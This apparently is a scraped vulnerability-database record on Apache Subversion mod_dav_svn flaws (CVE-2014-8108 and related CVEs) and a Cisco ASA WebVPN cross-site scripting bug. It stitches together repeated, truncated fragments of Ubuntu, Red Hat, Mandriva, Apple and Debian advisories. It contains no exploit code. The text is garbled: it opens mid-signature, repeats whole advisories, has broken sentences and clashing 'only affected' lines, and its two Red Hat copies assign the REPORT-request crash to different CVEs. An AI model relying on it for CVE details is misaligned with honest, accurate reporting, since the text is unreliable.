zlOOLTc8tjEXNuj5PnqflP0= =huIz -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2721-1 August 20, 2015 subversion vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 15.04 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Several security issues were fixed in Subversion. Software Description: - subversion: Advanced version control system Details: It was discovered that the Subversion mod_dav_svn module incorrectly handled REPORT requests for a resource that does not exist. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 14.04 LTS. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-0202) Evgeny Kotkov discovered that the Subversion mod_dav_svn and svnserve modules incorrectly certain crafted parameter combinations. (CVE-2015-0248) Ivan Zhakov discovered that the Subversion mod_dav_svn module incorrectly handled crafted v1 HTTP protocol request sequences. (CVE-2015-0251) C. Michael Pilato discovered that the Subversion mod_dav_svn module incorrectly restricted anonymous access. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3184) C. Michael Pilato discovered that Subversion incorrectly handled path-based authorization. (CVE-2015-3187) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 15.04: libapache2-svn 1.8.10-5ubuntu1.1 libsvn1 1.8.10-5ubuntu1.1 subversion 1.8.10-5ubuntu1.1 Ubuntu 14.04 LTS: libapache2-svn 1.8.8-1ubuntu3.2 libsvn1 1.8.8-1ubuntu3.2 subversion 1.8.8-1ubuntu3.2 Ubuntu 12.04 LTS: libapache2-svn 1.6.17dfsg-3ubuntu3.5 libsvn1 1.6.17dfsg-3ubuntu3.5 subversion 1.6.17dfsg-3ubuntu3.5 In general, a standard system update will make all the necessary changes. 6) - i386, noarch, x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: subversion security update Advisory ID: RHSA-2015:0166-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0166.html Issue date: 2015-02-10 CVE Names: CVE-2014-3528 CVE-2014-3580 CVE-2014-8108 ===================================================================== 1. Summary: Updated subversion packages that fix three security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Description: Subversion (SVN) is a concurrent version control system which enables one or more users to collaborate in developing and maintaining a hierarchy of files and directories while keeping a history of all changes. A remote, unauthenticated attacker could use a specially crafted REPORT request to crash mod_dav_svn. (CVE-2014-3580) A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled certain requests for URIs that trigger a lookup of a virtual transaction name. (CVE-2014-8108) It was discovered that Subversion clients retrieved cached authentication credentials using the MD5 hash of the server realm string without also checking the server's URL. A malicious server able to provide a realm that triggers an MD5 collision could possibly use this flaw to obtain the credentials for a different realm. (CVE-2014-3528) Red Hat would like to thank the Subversion project for reporting CVE-2014-3580 and CVE-2014-8108. Upstream acknowledges Evgeny Kotkov of VisualSVN as the original reporter. All subversion users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, for the update to take effect, you must restart the httpd daemon, if you are using mod_dav_svn, and the svnserve daemon, if you are serving Subversion repositories via the svn:// protocol. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1125799 - CVE-2014-3528 subversion: credentials leak via MD5 collision 1174054 - CVE-2014-3580 subversion: NULL pointer dereference flaw in mod_dav_svn when handling REPORT requests 1174057 - CVE-2014-8108 subversion: NULL pointer dereference flaw in mod_dav_svn when handling URIs for virtual transaction names 6. Package List: Red Hat Enterprise Linux Client Optional (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.i686.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.i686.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm ppc64: mod_dav_svn-1.7.14-7.el7_0.ppc64.rpm subversion-1.7.14-7.el7_0.ppc64.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm subversion-libs-1.7.14-7.el7_0.ppc.rpm subversion-libs-1.7.14-7.el7_0.ppc64.rpm s390x: mod_dav_svn-1.7.14-7.el7_0.s390x.rpm subversion-1.7.14-7.el7_0.s390x.rpm subversion-debuginfo-1.7.14-7.el7_0.s390.rpm subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm subversion-libs-1.7.14-7.el7_0.s390.rpm subversion-libs-1.7.14-7.el7_0.s390x.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: subversion-1.7.14-7.el7_0.ppc.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm subversion-devel-1.7.14-7.el7_0.ppc.rpm subversion-devel-1.7.14-7.el7_0.ppc64.rpm subversion-gnome-1.7.14-7.el7_0.ppc.rpm subversion-gnome-1.7.14-7.el7_0.ppc64.rpm subversion-javahl-1.7.14-7.el7_0.ppc.rpm subversion-javahl-1.7.14-7.el7_0.ppc64.rpm subversion-kde-1.7.14-7.el7_0.ppc.rpm subversion-kde-1.7.14-7.el7_0.ppc64.rpm subversion-perl-1.7.14-7.el7_0.ppc.rpm subversion-perl-1.7.14-7.el7_0.ppc64.rpm subversion-python-1.7.14-7.el7_0.ppc64.rpm subversion-ruby-1.7.14-7.el7_0.ppc.rpm subversion-ruby-1.7.14-7.el7_0.ppc64.rpm subversion-tools-1.7.14-7.el7_0.ppc64.rpm s390x: subversion-1.7.14-7.el7_0.s390.rpm subversion-debuginfo-1.7.14-7.el7_0.s390.rpm subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm subversion-devel-1.7.14-7.el7_0.s390.rpm subversion-devel-1.7.14-7.el7_0.s390x.rpm subversion-gnome-1.7.14-7.el7_0.s390.rpm subversion-gnome-1.7.14-7.el7_0.s390x.rpm subversion-javahl-1.7.14-7.el7_0.s390.rpm subversion-javahl-1.7.14-7.el7_0.s390x.rpm subversion-kde-1.7.14-7.el7_0.s390.rpm subversion-kde-1.7.14-7.el7_0.s390x.rpm subversion-perl-1.7.14-7.el7_0.s390.rpm subversion-perl-1.7.14-7.el7_0.s390x.rpm subversion-python-1.7.14-7.el7_0.s390x.rpm subversion-ruby-1.7.14-7.el7_0.s390.rpm subversion-ruby-1.7.14-7.el7_0.s390x.rpm subversion-tools-1.7.14-7.el7_0.s390x.rpm x86_64: subversion-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: subversion-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-3528 https://access.redhat.com/security/cve/CVE-2014-3580 https://access.redhat.com/security/cve/CVE-2014-8108 https://access.redhat.com/security/updates/classification/#moderate https://subversion.apache.org/security/CVE-2014-3528-advisory.txt https://subversion.apache.org/security/CVE-2014-3580-advisory.txt https://subversion.apache.org/security/CVE-2014-8108-advisory.txt 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFU2pCEXlSAg2UNWIIRAmlpAJ4o2MhM6glIBctGbU52rfN8EZXCDgCdEIll KM6EsnQkXd09uLTe1k+tQaU= =CuZg -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . These issues were addressed by updating Apache Subversion to version 1.7.19. CVE-ID CVE-2014-3522 CVE-2014-3528 CVE-2014-3580 CVE-2014-8108 Git Available for: OS X Mavericks v10.9.4 or later Impact: Synching with a malicious git repository may allow unexpected files to be added to the .git folder Description: The checks involved in disallowed paths did not account for case insensitivity or unicode characters. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial Xcode 6.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "6.2". For the stable distribution (wheezy), this problem has been fixed in version 1.6.17dfsg-4+deb7u7. For the unstable distribution (sid), this problem has been fixed in version 1.8.10-5
VAR-201412-0309 CVE-2014-8108 Apache Subversion of mod_dav_svn Apache HTTPD server Service disruption in modules (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.7.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a request for a URI that triggers a lookup for a virtual transaction name that does not exist. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Apache subversion is prone to a remote denial-of-service vulnerability. Exploiting this issue allows remote attackers to crash the affected process, causing denial of service conditions. Subversion versions 1.7.0 through 1.7.18 and 1.8.0 through 1.8.10 are affected. Subversion is an open source version control system of the Apache Software Foundation in the United States. The main function of the system is to be compatible with the concurrent version management system (CVS). The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFUqoNCmqjQ0CJFipgRAqwFAKCUALR1yu7OcAY6tP4LrYCdhQMJDACg7FG5 zlOOLTc8tjEXNuj5PnqflP0= =huIz -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2721-1 August 20, 2015 subversion vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 15.04 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Several security issues were fixed in Subversion. Software Description: - subversion: Advanced version control system Details: It was discovered that the Subversion mod_dav_svn module incorrectly handled REPORT requests for a resource that does not exist. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 14.04 LTS. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-0202) Evgeny Kotkov discovered that the Subversion mod_dav_svn and svnserve modules incorrectly certain crafted parameter combinations. (CVE-2015-0248) Ivan Zhakov discovered that the Subversion mod_dav_svn module incorrectly handled crafted v1 HTTP protocol request sequences. (CVE-2015-0251) C. Michael Pilato discovered that the Subversion mod_dav_svn module incorrectly restricted anonymous access. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3184) C. Michael Pilato discovered that Subversion incorrectly handled path-based authorization. (CVE-2015-3187) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 15.04: libapache2-svn 1.8.10-5ubuntu1.1 libsvn1 1.8.10-5ubuntu1.1 subversion 1.8.10-5ubuntu1.1 Ubuntu 14.04 LTS: libapache2-svn 1.8.8-1ubuntu3.2 libsvn1 1.8.8-1ubuntu3.2 subversion 1.8.8-1ubuntu3.2 Ubuntu 12.04 LTS: libapache2-svn 1.6.17dfsg-3ubuntu3.5 libsvn1 1.6.17dfsg-3ubuntu3.5 subversion 1.6.17dfsg-3ubuntu3.5 In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: subversion security update Advisory ID: RHSA-2015:0166-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0166.html Issue date: 2015-02-10 CVE Names: CVE-2014-3528 CVE-2014-3580 CVE-2014-8108 ===================================================================== 1. Summary: Updated subversion packages that fix three security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Description: Subversion (SVN) is a concurrent version control system which enables one or more users to collaborate in developing and maintaining a hierarchy of files and directories while keeping a history of all changes. The mod_dav_svn module is used with the Apache HTTP Server to allow access to Subversion repositories via HTTP. A remote, unauthenticated attacker could use a specially crafted REPORT request to crash mod_dav_svn. (CVE-2014-8108) It was discovered that Subversion clients retrieved cached authentication credentials using the MD5 hash of the server realm string without also checking the server's URL. A malicious server able to provide a realm that triggers an MD5 collision could possibly use this flaw to obtain the credentials for a different realm. (CVE-2014-3528) Red Hat would like to thank the Subversion project for reporting CVE-2014-3580 and CVE-2014-8108. Upstream acknowledges Evgeny Kotkov of VisualSVN as the original reporter. All subversion users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, for the update to take effect, you must restart the httpd daemon, if you are using mod_dav_svn, and the svnserve daemon, if you are serving Subversion repositories via the svn:// protocol. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1125799 - CVE-2014-3528 subversion: credentials leak via MD5 collision 1174054 - CVE-2014-3580 subversion: NULL pointer dereference flaw in mod_dav_svn when handling REPORT requests 1174057 - CVE-2014-8108 subversion: NULL pointer dereference flaw in mod_dav_svn when handling URIs for virtual transaction names 6. Package List: Red Hat Enterprise Linux Client Optional (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.i686.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.i686.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm ppc64: mod_dav_svn-1.7.14-7.el7_0.ppc64.rpm subversion-1.7.14-7.el7_0.ppc64.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm subversion-libs-1.7.14-7.el7_0.ppc.rpm subversion-libs-1.7.14-7.el7_0.ppc64.rpm s390x: mod_dav_svn-1.7.14-7.el7_0.s390x.rpm subversion-1.7.14-7.el7_0.s390x.rpm subversion-debuginfo-1.7.14-7.el7_0.s390.rpm subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm subversion-libs-1.7.14-7.el7_0.s390.rpm subversion-libs-1.7.14-7.el7_0.s390x.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: subversion-1.7.14-7.el7_0.ppc.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm subversion-devel-1.7.14-7.el7_0.ppc.rpm subversion-devel-1.7.14-7.el7_0.ppc64.rpm subversion-gnome-1.7.14-7.el7_0.ppc.rpm subversion-gnome-1.7.14-7.el7_0.ppc64.rpm subversion-javahl-1.7.14-7.el7_0.ppc.rpm subversion-javahl-1.7.14-7.el7_0.ppc64.rpm subversion-kde-1.7.14-7.el7_0.ppc.rpm subversion-kde-1.7.14-7.el7_0.ppc64.rpm subversion-perl-1.7.14-7.el7_0.ppc.rpm subversion-perl-1.7.14-7.el7_0.ppc64.rpm subversion-python-1.7.14-7.el7_0.ppc64.rpm subversion-ruby-1.7.14-7.el7_0.ppc.rpm subversion-ruby-1.7.14-7.el7_0.ppc64.rpm subversion-tools-1.7.14-7.el7_0.ppc64.rpm s390x: subversion-1.7.14-7.el7_0.s390.rpm subversion-debuginfo-1.7.14-7.el7_0.s390.rpm subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm subversion-devel-1.7.14-7.el7_0.s390.rpm subversion-devel-1.7.14-7.el7_0.s390x.rpm subversion-gnome-1.7.14-7.el7_0.s390.rpm subversion-gnome-1.7.14-7.el7_0.s390x.rpm subversion-javahl-1.7.14-7.el7_0.s390.rpm subversion-javahl-1.7.14-7.el7_0.s390x.rpm subversion-kde-1.7.14-7.el7_0.s390.rpm subversion-kde-1.7.14-7.el7_0.s390x.rpm subversion-perl-1.7.14-7.el7_0.s390.rpm subversion-perl-1.7.14-7.el7_0.s390x.rpm subversion-python-1.7.14-7.el7_0.s390x.rpm subversion-ruby-1.7.14-7.el7_0.s390.rpm subversion-ruby-1.7.14-7.el7_0.s390x.rpm subversion-tools-1.7.14-7.el7_0.s390x.rpm x86_64: subversion-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: subversion-1.7.14-7.el7_0.src.rpm x86_64: mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm subversion-1.7.14-7.el7_0.x86_64.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-libs-1.7.14-7.el7_0.i686.rpm subversion-libs-1.7.14-7.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: subversion-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.i686.rpm subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm subversion-devel-1.7.14-7.el7_0.i686.rpm subversion-devel-1.7.14-7.el7_0.x86_64.rpm subversion-gnome-1.7.14-7.el7_0.i686.rpm subversion-gnome-1.7.14-7.el7_0.x86_64.rpm subversion-javahl-1.7.14-7.el7_0.i686.rpm subversion-javahl-1.7.14-7.el7_0.x86_64.rpm subversion-kde-1.7.14-7.el7_0.i686.rpm subversion-kde-1.7.14-7.el7_0.x86_64.rpm subversion-perl-1.7.14-7.el7_0.i686.rpm subversion-perl-1.7.14-7.el7_0.x86_64.rpm subversion-python-1.7.14-7.el7_0.x86_64.rpm subversion-ruby-1.7.14-7.el7_0.i686.rpm subversion-ruby-1.7.14-7.el7_0.x86_64.rpm subversion-tools-1.7.14-7.el7_0.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-3528 https://access.redhat.com/security/cve/CVE-2014-3580 https://access.redhat.com/security/cve/CVE-2014-8108 https://access.redhat.com/security/updates/classification/#moderate https://subversion.apache.org/security/CVE-2014-3528-advisory.txt https://subversion.apache.org/security/CVE-2014-3580-advisory.txt https://subversion.apache.org/security/CVE-2014-8108-advisory.txt 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFU2pCEXlSAg2UNWIIRAmlpAJ4o2MhM6glIBctGbU52rfN8EZXCDgCdEIll KM6EsnQkXd09uLTe1k+tQaU= =CuZg -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . These issues were addressed by updating Apache Subversion to version 1.7.19. CVE-ID CVE-2014-3522 CVE-2014-3528 CVE-2014-3580 CVE-2014-8108 Git Available for: OS X Mavericks v10.9.4 or later Impact: Synching with a malicious git repository may allow unexpected files to be added to the .git folder Description: The checks involved in disallowed paths did not account for case insensitivity or unicode characters. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial Xcode 6.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "6.2"
VAR-201412-0295 CVE-2014-8012 Cisco Adaptive Security Appliance Software WebVPN Portal login page cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the WebVPN Portal Login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via crafted attributes in a cookie, aka Bug ID CSCuh24695. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuh24695
